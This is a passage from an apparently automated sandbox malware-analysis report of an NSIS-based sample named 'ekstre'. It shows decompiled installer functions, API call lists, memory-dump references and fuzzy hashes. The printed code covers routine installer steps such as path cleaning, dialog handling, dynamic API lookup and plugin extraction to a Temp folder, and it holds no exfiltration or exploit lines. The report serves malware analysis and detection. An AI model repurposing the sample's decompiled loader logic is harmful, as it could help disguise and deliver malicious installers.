				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004068f1
0x004068fa
0x00406911
0x00406911
0x00406918
0x00406924
0x00406924
0x00406927
0x0040692a
0x0040692f
0x00406931
0x0040693a
0x0040693e
0x0040695b
0x00406963
0x00406963
0x00406968
0x0040696a
0x0040696d
0x00406972
0x00406973
0x00406977
0x00406977
0x00406978
0x0040697f
0x00406981
0x00406988
0x00000000
0x00000000
0x00406990
0x00406996
0x00000000
0x00000000
0x00000000
0x00406996
0x0040699b

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,75D53420,004D5000,?,0040361B,004D5000,004D5000,00403923), ref: 00406952
CharNextW.USER32(?,?,?,00000000,?,0040361B,004D5000,004D5000,00403923), ref: 00406961
CharNextW.USER32(?,00000000,75D53420,004D5000,?,0040361B,004D5000,004D5000,00403923), ref: 00406966
CharPrevW.USER32(?,?,75D53420,004D5000,?,0040361B,004D5000,004D5000,00403923), ref: 00406979

Strings

*?|<>/":, xrefs: 00406941

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x470260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 58071fecc746d0f376884a3e10e7d51b14d85d1850ac462e0185ea8672b5ef47
Instruction ID: 624ac4784615ce63dc07ef02f7b825d3173763d74ee411cf76b7c4d1df5b7033
Opcode Fuzzy Hash: 58071fecc746d0f376884a3e10e7d51b14d85d1850ac462e0185ea8672b5ef47
Instruction Fuzzy Hash: 2B21F872904119AFCB05DBA4DE45AEEBBB5EF08304F14003AF945F62A1DB389D51DB98

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD1F7B Relevance: 7.5, APIs: 5, Instructions: 38
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DDD1F7B(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t11;

				_t11 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t11);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t11, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x6ddd1f92
0x6ddd1fa0
0x6ddd1fab
0x6ddd1fb6
0x6ddd1fbf
0x6ddd1fca

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,6DDD2B4C,00000000,00000808), ref: 6DDD1F8C
GlobalAlloc.KERNEL32(00000040,00000000), ref: 6DDD1F97
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6DDD1FAB
GetProcAddress.KERNEL32(?,00000000), ref: 6DDD1FB6
GlobalFree.KERNEL32(00000000), ref: 6DDD1FBF

Memory Dump Source

Source File: 00000000.00000002.1347263504.000000006DDD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DDD0000, based on PE: true

Associated: 00000000.00000002.1347232243.000000006DDD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347305831.000000006DDD4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347348567.000000006DDD6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ddd0000_ekstre.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 367600b4f2a18769f05cfe10547d6bf2627bc7a6f088b4a8cdade6fba6606cac
Instruction ID: bc5be37d0787e20a4e97ba02d333f68b820d5e1b26a96616ee4e63228478a04e
Opcode Fuzzy Hash: 367600b4f2a18769f05cfe10547d6bf2627bc7a6f088b4a8cdade6fba6606cac
Instruction Fuzzy Hash: 71F0C032148118BBDF102BE7DC0CE67BE7CEB8F6FAB160215F619D11A0C66268008B71

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push("true");
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: df9e9dd23ef79b059d104df5a1a5c29d43fef64e7901706557f000c593af14be
Instruction ID: 2b7fef74a1ecbfa2811e8617818f10e77e8ac0f2b345209abc679ece4561fc10
Opcode Fuzzy Hash: df9e9dd23ef79b059d104df5a1a5c29d43fef64e7901706557f000c593af14be
Instruction Fuzzy Hash: 14218D7194420AAFEF05AFA4D94AAAE7BB4FF44304F14453EF605B61D0D7B889418B98

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD1F1E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DDD1F1E(intOrPtr _a4, WCHAR* _a8) {
				intOrPtr _t11;
				intOrPtr _t19;
				WCHAR* _t21;

				_t11 = _a4;
				if( *((intOrPtr*)(_t11 + 4)) != 1) {
					_t21 = _a8;
					_t13 =  ==  ? 0x6ddd40d8 : L"error";
					lstrcpyW(_t21,  ==  ? 0x6ddd40d8 : L"error");
				} else {
					_t19 =  *((intOrPtr*)(_t11 + 0x1c98));
					if(( *(_t11 + 0x1010) & 0x00000100) != 0) {
						_t19 =  *((intOrPtr*)( *((intOrPtr*)(_t11 + 0x100c)) + 1));
					}
					_t21 = _a8;
					wsprintfW(_t21, L"callback%d", _t19);
				}
				return _t21;
			}

0x6ddd1f1e
0x6ddd1f29
0x6ddd1f5c
0x6ddd1f6c
0x6ddd1f71
0x6ddd1f2b
0x6ddd1f35
0x6ddd1f3b
0x6ddd1f43
0x6ddd1f43
0x6ddd1f46
0x6ddd1f51
0x6ddd1f57
0x6ddd1f7a

APIs

wsprintfW.USER32 ref: 6DDD1F51
lstrcpyW.KERNEL32(?,error), ref: 6DDD1F71

Strings

callback%d, xrefs: 6DDD1F4B
error, xrefs: 6DDD1F67, 6DDD1F6F

Memory Dump Source

Source File: 00000000.00000002.1347263504.000000006DDD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DDD0000, based on PE: true

Associated: 00000000.00000002.1347232243.000000006DDD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347305831.000000006DDD4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347348567.000000006DDD6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ddd0000_ekstre.jbxd

Similarity

API ID: lstrcpywsprintf
String ID: callback%d$error
API String ID: 2408954437-1307476583
Opcode ID: f1c7ce1ea81b1f1a4cd73ae75851284877e2932479416ce5009ef6a315b6665e
Instruction ID: 4cf23b0bcad1122473aff955bb03fb15d8f65133e78edc051ed45c936033d1fd
Opcode Fuzzy Hash: f1c7ce1ea81b1f1a4cd73ae75851284877e2932479416ce5009ef6a315b6665e
Instruction Fuzzy Hash: 1BF01235244110EFDF44AB14D948EB673A9EF8A310F0585A8F9999B355C774EC448B91

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040668A("C:\Users\Arthur\AppData\Local\Temp\nsc76F4.tmp", "C:\Users\Arthur\AppData\Local\Temp\nsc76F4.tmp\System.dll", 0x2000);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsc76F4.tmp\System.dll");
					}
				} else {
					E00402D84("true");
					 *0x40e5f8 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E004065C8(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E00406239(_t31, _t31) >= 0) {
						_t14 = E0040620A(_t31, "C:\Users\Arthur\AppData\Local\Temp\nsc76F4.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x0040263e
0x0040263e
0x0040263e
0x00402643
0x00402646
0x00402649
0x0040264e
0x00402650
0x00402670
0x004026aa
0x00402672
0x00402674
0x00402688
0x00402695
0x00402695
0x00402652
0x00402654
0x00402659
0x00402667
0x0040266a
0x004026af
0x004026b2
0x0040292e
0x0040292e
0x004026b8
0x004026c1
0x004026c3
0x004026e2
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x004026c3
0x00402c2d
0x00402c39

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll), ref: 00402695

Strings

C:\Users\user\AppData\Local\Temp\nsc76F4.tmp, xrefs: 00402683
C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll, xrefs: 00402659, 0040267E, 00402690, 004026DC

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp$C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll
API String ID: 1659193697-1928175197
Opcode ID: 8abba90b3b15dc36ed4df20276bbb25385cf020a755eacf0b223465c11d73c04
Instruction ID: fbf04104db2deae584de8c4df279ff80da7ecba66b5d13e1d77a0b215908b1f1
Opcode Fuzzy Hash: 8abba90b3b15dc36ed4df20276bbb25385cf020a755eacf0b223465c11d73c04
Instruction Fuzzy Hash: 0E112B72A01211FADB14BBB18E8EE9D76709F40748F210C3FF002B61C1EAFD8991565D

Uniqueness

Uniqueness Score: -1.00%

Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x446734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x446734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x44673c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, "true");
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}

0x00405642
0x0040564c
0x00405668
0x0040568a
0x0040568d
0x00405693
0x0040569d
0x0040569e
0x004056a0
0x004056a6
0x004056a6
0x004056b0
0x00000000
0x004056be
0x00405675
0x004056ad
0x004056ad
0x00000000
0x004056ad
0x00405681
0x00405683
0x00000000
0x00405683
0x00405652
0x00000000
0x00000000
0x00405659
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 0040566D
CallWindowProcW.USER32(?,?,?,?), ref: 004056BE

Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622

Strings

, xrefs: 0040564E

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: d947304be205e2ecbcca3225b28cfa45c889536dc93edbe464f15d86bb1dbb29
Instruction ID: cf649f65924c36d4a7a626b4327954ac0a46d0fcc590d8dc98f085a98131112b
Opcode Fuzzy Hash: d947304be205e2ecbcca3225b28cfa45c889536dc93edbe464f15d86bb1dbb29
Instruction Fuzzy Hash: 4101B131100708AFEF205F11DD84A6B3A25EB85364F904837FA08752E0DB7B8C929E6E

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x004060cd
0x004060cf
0x004060d2
0x004060fe
0x004060d7
0x004060e0
0x004060e5
0x004060f0
0x004060f3
0x0040610f
0x004060f5
0x004060fc
0x00000000
0x004060fc
0x00406108
0x0040610c
0x0040610c
0x00406106
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060E5
CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
